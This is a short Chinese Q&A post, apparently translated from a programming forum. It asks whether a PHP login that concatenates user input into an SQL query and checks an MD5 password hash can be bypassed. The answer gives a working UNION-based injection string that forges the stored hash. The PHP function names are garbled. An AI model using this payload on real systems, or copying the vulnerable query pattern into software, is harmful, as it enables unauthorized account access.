我最近想过这样的事情:
$sql = "SELECT password FROM users WHERE user = '" . $_POST["user"] . "'";
$result = MysqL_query($sql);
if (myql_num_rows($result) != 1) {
//Error
}
$data = MysqL_fetch_array($result);
if ($data["password"] == md5($_POST["password"])) {
//Welcome
} else {
//Error
}
即使没有使用参数化查询或至少转义,我也想不到一个适当的sql注入,你可以通过它注入欢迎点.您可能需要修改返回的密码,其md5值可以用作密码.
任何想法,如果这是可能的?
解决方法:
对用户使用以下值:
obvIoUslyinvalidusername' union select MD5('password123') as password --